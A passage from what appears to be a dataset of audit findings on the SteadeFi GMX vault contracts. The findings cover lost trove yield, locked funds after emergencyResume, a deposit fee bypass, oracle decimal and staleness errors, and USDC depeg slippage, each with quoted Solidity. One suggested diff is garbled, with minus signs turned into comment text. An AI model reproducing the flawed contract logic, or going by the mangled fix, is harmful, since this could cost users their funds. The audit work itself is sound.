trove contract are not claimed during the emergency close flow and can not be claimed in a normal way during this situation, because of a status change. Therefore, all the acquired yield will be lost.\\nWhen users deposit, or withdraw tokens, all acquired yield from GMX is sent to the trove contract:\\n```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of depositor's assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n // rest of code\\n}\\n```\\n\\n```\\nfunction withdraw(\\n GMXTypes.Store storage self,\\n GMXTypes.WithdrawParams memory wp\\n) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of withdrawers assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n // rest of code\\n}\\n```\\n\\nThe only way in the system to claim these yield is the compound function, which calls the beforeCompoundChecks function:\\n```\\nfunction compound(\\n GMXTypes.Store storage self,\\n GMXTypes.CompoundParams memory cp\\n) external {\\n // Transfer any tokenA/B from trove to vault\\n if (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(\\n address(self.trove),\\n address(this),\\n self.tokenA.balanceOf(address(self.trove))\\n );\\n }\\n if (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n 
self.tokenB.safeTransferFrom(\\n address(self.trove),\\n address(this),\\n self.tokenB.balanceOf(address(self.trove))\\n );\\n }\\n // rest of code\\n GMXChecks.beforeCompoundChecks(self);\\n // rest of code\\n}\\n```\\n\\nThis function reverts if the current status of the system is not Open or Compound_Failed:\\n```\\nfunction beforeCompoundChecks(\\n GMXTypes.Store storage self\\n) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Compound_Failed\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n // rest of code\\n}\\n```\\n\\nAs the emergency close flow updates this status to Paused and later to Closed, calling compound will revert:\\n```\\nfunction emergencyPause(\\n GMXTypes.Store storage self\\n) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n}\\n```\\n\\n```\\nfunction emergencyClose(\\n GMXTypes.Store storage self,\\n uint256 deadline\\n) external {\\n GMXChecks.beforeEmergencyCloseChecks(self);\\n\\n // Repay all borrowed assets; 1e18 == 100% shareRatio to repay\\n GMXTypes.RepayParams memory _rp;\\n (\\n _rp.repayTokenAAmt,\\n _rp.repayTokenBAmt\\n ) = GMXManager.calcRepay(self, 1e18);\\n\\n (\\n bool _swapNeeded,\\n address _tokenFrom,\\n address _tokenTo,\\n uint256 _tokenToAmt\\n ) = GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = deadline;\\n\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n\\n GMXManager.repay(\\n 
self,\\n _rp.repayTokenAAmt,\\n _rp.repayTokenBAmt\\n );\\n\\n self.status = GMXTypes.Status.Closed;\\n\\n emit EmergencyClose(\\n _rp.repayTokenAAmt,\\n _rp.repayTokenBAmt\\n );\\n}\\n```\\n\\nAnd as we can see during these process the funds inside the trove contract are never claimed and as the strategy vault is the only address that can claim the funds of the trove, all funds are gone.\\n```\\ncontract GMXTrove {\\n\\n /* ==================== STATE VARIABLES ==================== */\\n\\n // Address of the vault this trove handler is for\\n IGMXVault public vault;\\n\\n /* ====================== CONSTRUCTOR ====================== */\\n\\n /**\\n * @notice Initialize trove contract with associated vault address\\n * @param _vault Address of vault\\n */\\n constructor (address _vault) {\\n vault = IGMXVault(_vault);\\n\\n GMXTypes.Store memory _store = vault.store();\\n\\n // Set token approvals for this trove's vault contract\\n _store.tokenA.approve(address(vault), type(uint256).max);\\n _store.tokenB.approve(address(vault), type(uint256).max);\\n }\\n}\\n```\\n",Transfer the funds inside the trove into the vault during the emergency close process.,"If a strategy vault is closed, all funds in the trove are lost.","```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of depositor's assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n // rest of code\\n}\\n```\\n" +emergencyResume does not handle the afterDepositCancellation case correctly,medium,"The `emergencyResume` function is intended to recover the vault's liquidity following an 
`emergencyPause`. It operates under the assumption of a successful deposit call. However, if the deposit call is cancelled by GMX, the `emergencyResume` function does not account for this scenario, potentially locking funds.\\nWhen `emergencyResume` is invoked, it sets the vault's status to ""Resume"" and deposits all LP tokens back into the pool. The function is designed to execute when the vault status is ""Paused"" and can be triggered by an approved keeper.\\n```\\nfunction emergencyResume(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n\\nShould the deposit fail, the callback contract's `afterDepositCancellation` is expected to revert, which does not impact the continuation of the GMX execution. 
After the cancellation occurs, the vault status is ""Resume"", and the liquidity is not re-added to the pool.\\n```\\nfunction afterDepositCancellation(\\n bytes32 depositKey,\\n IDeposit.Props memory /* depositProps */,\\n IEvent.Props memory /* eventData */\\n ) external onlyController {\\n GMXTypes.Store memory _store = vault.store();\\n\\n if (_store.status == GMXTypes.Status.Deposit) {\\n if (_store.depositCache.depositKey == depositKey)\\n vault.processDepositCancellation();\\n } else if (_store.status == GMXTypes.Status.Rebalance_Add) {\\n if (_store.rebalanceCache.depositKey == depositKey)\\n vault.processRebalanceAddCancellation();\\n } else if (_store.status == GMXTypes.Status.Compound) {\\n if (_store.compoundCache.depositKey == depositKey)\\n vault.processCompoundCancellation();\\n } else {\\n revert Errors.DepositCancellationCallback();\\n }\\n }\\n```\\n\\nGiven this, another attempt to execute `emergencyResume` will fail because the vault status is not ""Paused"".\\n```\\nfunction beforeEmergencyResumeChecks (\\n GMXTypes.Store storage self\\n ) external view {\\n if (self.status != GMXTypes.Status.Paused)\\n revert Errors.NotAllowedInCurrentVaultStatus();\\n }\\n```\\n\\nIn this state, an attempt to revert to ""Paused"" status via `emergencyPause` could fail in GMXManager.removeLiquidity, as there are no tokens to send back to the GMX pool, leading to a potential fund lock within the contract.","To address this issue, handle the afterDepositCancellation case correctly by allowing emergencyResume to be called again.",The current implementation may result in funds being irretrievably locked within the contract.,"```\\nfunction emergencyResume(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = 
self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n" +A depositor of the GMXVault can bypass paying the fee when the depositor deposit into the GMXVault.,medium,"The fee-minted in the form of shares (svTokens) would not be subtracted from the amount of shares (svTokens) to be minted to the GMXVault's depositor.\\nDue to that, a depositor of the GMXVault could receive the amount of the shares (svTokens), which the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() was not subtracted.\\nThis means that a depositor of the GMXVault can bypass paying the fee when the depositor deposit into the GMXVault.\\nWithin the GMXDeposit#deposit(), the GMXVault#mintFee() would be called to mint the fee in the form of the svTokens like this: https://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXDeposit.sol#L119\\n```\\n /**\\n * @notice @inheritdoc GMXVault\\n * @param self GMXTypes.Store\\n * @param isNative Boolean as to whether user is depositing native asset (e.g. 
ETH, AVAX, etc.)\\n */\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n // rest of code\\n self.status = GMXTypes.Status.Deposit;\\n\\n self.vault.mintFee(); ///<----------------------- @audit\\n // rest of code\\n```\\n\\nWithin the GMXVault#mintFee(), the amount (GMXReader.pendingFee(_store)) of the shares would be minted to the treasury (_store.treasury) in the form of the svTokens like this: https://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXVault.sol#L335\\n```\\n /**\\n * @notice Mint vault token shares as management fees to protocol treasury\\n */\\n function mintFee() public {\\n _mint(_store.treasury, GMXReader.pendingFee(_store)); ///<------------ @audit\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n\\nWhen callback of deposit, the the GMXDeposit#processDeposit() would be called via the GMXVault#deposit().\\nWithin the GMXDeposit#processDeposit(), the amount (self.depositCache.sharesToUser) of shares (VaultTokens) would be minted to the GMXVault's depositor (self.depositCache.user) like this: https://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXDeposit.sol#L172\\n```\\n /**\\n * @notice @inheritdoc GMXVault\\n * @param self GMXTypes.Store\\n */\\n function processDeposit(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeProcessDepositChecks(self);\\n\\n // We transfer the core logic of this function to GMXProcessDeposit.processDeposit()\\n // to allow try/catch here to catch for any issues or any checks in afterDepositChecks() failing.\\n // If there are any issues, a DepositFailed event will be emitted and processDepositFailure()\\n // should be triggered to refund assets accordingly and reset the vault status to Open again.\\n try GMXProcessDeposit.processDeposit(self) {\\n // Mint shares to depositor\\n self.vault.mint(self.depositCache.user, self.depositCache.sharesToUser); ///<------------- 
@audit\\n // rest of code\\n```\\n\\nWithin the GMXDeposit#processDeposit() above, the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() is supposed to be subtracted from the amount of the shares to be minted to the GMXVault's depositor via the GMXDeposit#processDeposit().\\nHowever, there is no logic to subtract the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() from the amount of the shares to be minted to the GMXVault's depositor in the form of the shares (svTokens) via the GMXDeposit#processDeposit().","Within the GMXDeposit#processDeposit(), consider adding a logic to subtract the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() from the amount of the shares to be minted to the GMXVault's depositor in the form of the shares (svTokens) via the GMXDeposit#processDeposit().","The depositor could receive the amount of the shares (svTokens), which the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() was not subtracted.\\nThis means that a depositor of the GMXVault can bypass paying the fee when the depositor deposit into the GMXVault.","```\\n /**\\n * @notice @inheritdoc GMXVault\\n * @param self GMXTypes.Store\\n * @param isNative Boolean as to whether user is depositing native asset (e.g. 
ETH, AVAX, etc.)\\n */\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n // rest of code\\n self.status = GMXTypes.Status.Deposit;\\n\\n self.vault.mintFee(); ///<----------------------- @audit\\n // rest of code\\n```\\n" +Incorrect depositable shortToken amount calculation in Delta neutral vaults,medium,"When calculating the maximum possible depositable amount for delta neutral vaults, `_maxTokenBLending` is calculated incorrectly.\\n```\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n (uint256 _tokenAWeight, ) = tokenWeights(self);\\n\\n\\n uint256 _maxTokenALending = convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenALendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER);\\n\\n\\n uint256 _maxTokenBLending = convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenBLendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER)\\n - 1e18;\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXReader.sol#L254-L270\\nIf `a` user wants to deposit `v` value to `a` `l` leveraged delta neutral vault with token weights `a` and `b`, the calculation of required lending amount would be as follows:\\n```\\nTotal value to deposit to GMX = lv\\nValue of tokens to short = lva\\nHence this value will be borrowed from the tokenA lending vault\\nRemaining value to borrow (from tokenB lending vault) = lv - lva - v (deposit value provided by user)\\nHence if there is Tb value of tokens in tokenB lending vault, v <= Tb / (l - la - 1)\\n```\\n","Change the formula to the correct one.\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/strategy/gmx/GMXReader.sol b/contracts/strategy/gmx/GMXReader.sol\\nindex 73bb111..ae819c4 100644\\n// Remove the line below\\n// Remove the 
line below\\n// Remove the line below\\n a/contracts/strategy/gmx/GMXReader.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/strategy/gmx/GMXReader.sol\\n@@ // Remove the line below\\n266,8 // Add the line below\\n266,7 @@ library GMXReader {\\n address(self.tokenB),\\n self.tokenBLendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n// Remove the line below\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER)\\n// Remove the line below\\n // Remove the line below\\n 1e18;\\n// Add the line below\\n / (self.leverage // Remove the line below\\n (self.leverage *_tokenAWeight / SAFE_MULTIPLIER) // Remove the line below\\n 1e18);\\n \\n _additionalCapacity = _maxTokenALending > _maxTokenBLending ? _maxTokenBLending : _maxTokenALending;\\n }\\n```\\n","Deposit attempts can revert even when there is enough tokens to lend causing inefficiency, loss of gas for depositors and deviation from the protocol specification.","```\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n (uint256 _tokenAWeight, ) = tokenWeights(self);\\n\\n\\n uint256 _maxTokenALending = convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenALendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER);\\n\\n\\n uint256 _maxTokenBLending = convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenBLendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER)\\n - 1e18;\\n```\\n" +GMXOracle.sol#L280: function `getLpTokenAmount` icorrectly assumes that the returned price is in 18 decimal places. But it is 30 decimal places.,low,"`GMXOracle` oracle has a function getLpTokenAmount which is in scope. 
This is Used in keeper script to calculate how much LP tokens for given USD value.\\nThis function returns the `lpTokenAmount` with 30 decimal places instead of 18 as the function assumes.\\nLets look at the function getLpTokenAmount\\n```\\n /**\\n * @notice Get token A and token B's LP token amount required for a given value\\n * @param givenValue Given value needed, expressed in 1e30 -------------------------- refer this\\n * @param marketToken LP token address\\n * @param indexToken Index token address\\n * @param longToken Long token address\\n * @param shortToken Short token address\\n * @param isDeposit Boolean for deposit or withdrawal\\n * @param maximize Boolean for minimum or maximum price\\n * @return lpTokenAmount Amount of LP tokens; expressed in 1e18 --------------> refer this\\n */\\n function getLpTokenAmount(\\n uint256 givenValue,\\n address marketToken,\\n address indexToken,\\n address longToken,\\n address shortToken,\\n bool isDeposit,\\n bool maximize\\n ) public view returns (uint256) {\\n uint256 _lpTokenValue = getLpTokenValue(\\n marketToken,\\n indexToken,\\n longToken,\\n shortToken,\\n isDeposit,\\n maximize\\n );\\n\\n\\n return givenValue * SAFE_MULTIPLIER / _lpTokenValue;\\n }\\n```\\n\\nSAFE_MULTIPLIER is in 18 decimal places.\\nThe values returned from the function `_lpTokenValue` is in 18 decimal places. Refer the line\\nSo the final returned value from the function `getLpTokenAmount` is (1e30 * 1e18) / 1e18 = 1e30","GMXOracle.sol#L280: function `getLpTokenAmount` icorrectly assumes that the returned price is in 18 decimal places. 
But it is 30 decimal places.\\nUpdate the function `getLpTokenAmount` as shown below.\\n```\\n function getLpTokenAmount(\\n uint256 givenValue,\\n address marketToken,\\n address indexToken,\\n address longToken,\\n address shortToken,\\n bool isDeposit,\\n bool maximize\\n ) public view returns (uint256) {\\n uint256 _lpTokenValue = getLpTokenValue(\\n marketToken,\\n indexToken,\\n longToken,\\n shortToken,\\n isDeposit,\\n maximize\\n );\\n\\n return givenValue * SAFE_MULTIPLIER / _lpTokenValue; ------ remove\\n\\n return (givenValue * SAFE_MULTIPLIER) / (_lpTokenValue * 1e12); ---- add\\n \\n }\\n```\\n",Overestimating the lpToken amount for the given USD value.,"```\\n /**\\n * @notice Get token A and token B's LP token amount required for a given value\\n * @param givenValue Given value needed, expressed in 1e30 -------------------------- refer this\\n * @param marketToken LP token address\\n * @param indexToken Index token address\\n * @param longToken Long token address\\n * @param shortToken Short token address\\n * @param isDeposit Boolean for deposit or withdrawal\\n * @param maximize Boolean for minimum or maximum price\\n * @return lpTokenAmount Amount of LP tokens; expressed in 1e18 --------------> refer this\\n */\\n function getLpTokenAmount(\\n uint256 givenValue,\\n address marketToken,\\n address indexToken,\\n address longToken,\\n address shortToken,\\n bool isDeposit,\\n bool maximize\\n ) public view returns (uint256) {\\n uint256 _lpTokenValue = getLpTokenValue(\\n marketToken,\\n indexToken,\\n longToken,\\n shortToken,\\n isDeposit,\\n maximize\\n );\\n\\n\\n return givenValue * SAFE_MULTIPLIER / _lpTokenValue;\\n }\\n```\\n" +`Chainlink.latestRoundData()` may return stale results,low,"The `_getChainlinkResponse()` function is used to get the price of tokens, the problem is that the function does not check for stale results.\\nThe `ChainlinkOracle._getChainlinkResponse()` function is used to get latest Chainlink response.\\n```\\nfunction 
_getChainlinkResponse(address _feed) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _chainlinkResponse;\\n\\n _chainlinkResponse.decimals = AggregatorV3Interface(_feed).decimals();\\n\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n\\n _chainlinkResponse.roundId = _latestRoundId;\\n _chainlinkResponse.answer = _latestAnswer;\\n _chainlinkResponse.timestamp = _latestTimestamp;\\n _chainlinkResponse.success = true;\\n\\n return _chainlinkResponse;\\n }\\n```\\n\\nThe problem is that there is not check for stale data. There are some reasons that the price feed can become stale.","Read the updatedAt return value from the `Chainlink.latestRoundData()` function and verify that is not older than than specific time tolerance.\\n```\\nrequire(block.timestamp - udpatedData < toleranceTime, ""stale price"");\\n```\\n","Since the token prices are used in many contracts, stale data could be catastrophic for the project.","```\\nfunction _getChainlinkResponse(address _feed) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _chainlinkResponse;\\n\\n _chainlinkResponse.decimals = AggregatorV3Interface(_feed).decimals();\\n\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n\\n _chainlinkResponse.roundId = _latestRoundId;\\n _chainlinkResponse.answer = _latestAnswer;\\n _chainlinkResponse.timestamp = _latestTimestamp;\\n _chainlinkResponse.success = true;\\n\\n return _chainlinkResponse;\\n }\\n```\\n" +"USDC is not valued correctly in case of a depeg, which causes a loss of funds",low,"USDC is not valued correctly in case of a depeg, which causes a loss of funds.\\nThe protocol uses a chainlink feed to get prices of a 
specific token. In this case the token of interest is USDC which is a stable coin. Let us get some context for this issue, from the GMX V2 documentation we can read the following:\\nIn case the price of a stablecoin depegs from 1 USD: To ensure that profits for all short positions can always be fully paid out, the contracts will pay out profits in the stablecoin based on a price of 1 USD or the current Chainlink price for the stablecoin, whichever is higher. For swaps using the depegged stablecoin, a spread from 1 USD to the Chainlink price of the stablecoin will apply. If Chainlink Data Stream prices are used then the spread would be from the data stream and may not be to 1 USD.\\nhttps://gmx-docs.io/docs/trading/v2\\nFrom the above snippet we now know that gmx will never value USDC below 1$ when closing a short or withdrawing from a position, and that gmx uses the spread from 1 usd to the chainlink price is used. The problem here is that Steadefi does not account for this and will continue to use the chainlink price of usdc in a withdraw and swap when calculating the appropriate slippage amount. Let me demonstrate.\\n```\\nfunction consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);\\n\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n\\nHere consult calls `_getChainlinkResponse(_feed)` which gets the current value of a token, for our purpose this token is USDC. 
The problem begins because consult is called by `consultIn18Decimals` and this is called by `convertToUsdValue`, this is then called by `calcMinTokensSlippageAmt`. This function decides how much slippage is appropriate given the value of the asset being withdrawn. The problem is, as I showed, it will use chainlink value of USDC and in case of a depeg, it will use the depegged value. But as I have shown from gmx docs, when withdrawing, the value of USDC will always be valued at 1 or higher. So now we are calculating slippage for a usdc value that is depegged when we are withdrawing on gmx with the pegged assets normal value.\\nFor example\\nthere is a depeg of usdc\\nusdc chainlink value is $ 0.4\\ngmx withdraw value is always $1\\nbecause we use the chainlink value to calc slippage tolerance, we will be using the slippage tolerance for a USDC price of 0.4 when in fact we are valuing USDC at $1 in gmx. The amount of slippage allowed will be very incorrect and in some cases extreme. In case of total depeg, slippage will be almost 99% and users may lose almost all of their funds when trying to withdraw.",implement logic specific to stablecoins to handle depeg events. Such would be to always value stable coins at the maximum of the stablecoin's proposed value and the chainlink response value. 
Currently we are only using the chainlink response answer to valuate stable coins like usdc, and as i have explained this is a problem.","In case of total depeg, slippage will be almost 99% and users may lose almost all of their funds when trying to withdraw.","```\\nfunction consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);\\n\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n" +Depositing to the GMX POOl will return sub-optimal return if the Pool is imbalanced,medium,"Whenever A user deposits tokens to vault, vault create a leverage position depending[delta or delta neutral] in the GMX POOl. performing a proportional deposit is not optimal in every case and depositng tokens in such case will result in fewer LP tokens due to sub optimal trade. 
Eventually leading to a loss of gain for the strategy vault\\nAlice deposits token A() into the vault to make Delta.Neutral position\\n```\\nFile: GMXVault.sol\\n\\n function deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n```\\n\\nvault refer to deposit to GMXDeposit library to execute the further logic\\n```\\nFile: GMXDeposit.sol\\n\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n[// rest of code// rest of code// rest of code// rest of code// rest of code.]\\n // Borrow assets and create deposit in GMX\\n (\\n uint256 _borrowTokenAAmt,\\n uint256 _borrowTokenBAmt\\n ) = GMXManager.calcBorrow(self, _dc.depositValue);\\n\\n [// rest of code// rest of code// rest of code]\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXDeposit.sol#L54\\nwhich calls calcBorrow on GMXManager Library for borrowing assets and making the position IN GMX POOL\\n```\\nFile: GMXManager.sol\\n\\n /**\\n * @notice Calculate amount of tokenA and tokenB to borrow\\n * @param self GMXTypes.Store\\n * @param depositValue USD value in 1e18\\n */\\n function calcBorrow(\\n GMXTypes.Store storage self,\\n uint256 depositValue\\n ) external view returns (uint256, uint256) {\\n // Calculate final position value based on deposit value\\n uint256 _positionValue = depositValue * self.leverage / SAFE_MULTIPLIER;\\n\\n // Obtain the value to borrow\\n uint256 _borrowValue = _positionValue - depositValue;\\n\\n uint256 _tokenADecimals = IERC20Metadata(address(self.tokenA)).decimals();\\n uint256 _tokenBDecimals = IERC20Metadata(address(self.tokenB)).decimals();\\n uint256 _borrowLongTokenAmt;\\n uint256 _borrowShortTokenAmt;\\n\\n [// rest of code// rest of code// rest of code// rest of code// rest of code// rest of code..]\\n\\n // If delta is neutral, borrow appropriate amount in long token to hedge, and the 
rest in short token\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n // Get token weights in LP, e.g. 50% = 5e17\\n (uint256 _tokenAWeight,) = GMXReader.tokenWeights(self);\\n\\n // Get value of long token (typically tokenA)\\n uint256 _longTokenWeightedValue = _tokenAWeight * _positionValue / SAFE_MULTIPLIER;\\n\\n // Borrow appropriate amount in long token to hedge\\n _borrowLongTokenAmt = _longTokenWeightedValue * SAFE_MULTIPLIER\\n / GMXReader.convertToUsdValue(self, address(self.tokenA), 10**(_tokenADecimals))\\n / (10 ** (18 - _tokenADecimals));\\n\\n // Borrow the shortfall value in short token\\n _borrowShortTokenAmt = (_borrowValue - _longTokenWeightedValue) * SAFE_MULTIPLIER\\n / GMXReader.convertToUsdValue(self, address(self.tokenB), 10**(_tokenBDecimals))\\n / (10 ** (18 - _tokenBDecimals));\\n }\\n[// rest of code// rest of code// rest of code// rest of code// rest of code// rest of code// rest of code]\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXManager.sol#L70\\nHere it consider the current reserve ratio of the pool and deposits in the same ratio.\\nWhile GMX docs clearly state that If deposits try to create balance in the pool[depositing in such way which will make actual token weight of index Token towards the TOKEN_WEIGHT defined in the pool] will get benefit technically more LP tokens and oppose to this less LP token if current deposits imbalance the Pool reserve the ratio Reference\\nEven Curve pools work in the same way. Depositer get benefit if they try to balance the pool reserve making them optimal",Depositing to the GMX POOl will return sub-optimal return if the Pool is imbalanced\\nconsider implementing check and if the pool is imablanced depositing(making levearge position) towards balancing the Index Token's weight will give optimal returns[extra LP tokens ],"It is clear that Weight of index token will not be always near equal to the Defined Total_Weight of the Pool. 
So if the pool is imbalanced Depositing into GMXPool will not give optimal returns( resulting in fewer LP token), eventually leading to the loss of gain for the depositers affecting net APR","```\\nFile: GMXVault.sol\\n\\n function deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n```\\n" +The `svTokenValue` function can return overestimated value of each strategy vault share token,medium,"The `GMXReader.svTokenValue` function can return overestimated value of each strategy vault share token due to outdated `totalSupply`, i.e. without including pending management fees for a long period. This issue can cause the protocol unexpected behavior while keepers provide rebalance and when other protocols receive information about shares value.\\nThe `svTokenValue` function calculates the value of each strategy vault share token with the current amount of `totalSupply`, which may not include pending management fees:\\n```\\n function svTokenValue(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 equityValue_ = equityValue(self);\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n if (equityValue_ == 0 || totalSupply_ == 0) return SAFE_MULTIPLIER;\\n return equityValue_ * SAFE_MULTIPLIER / totalSupply_;\\n }\\n```\\n\\nSo the returned share value will be overestimated. 
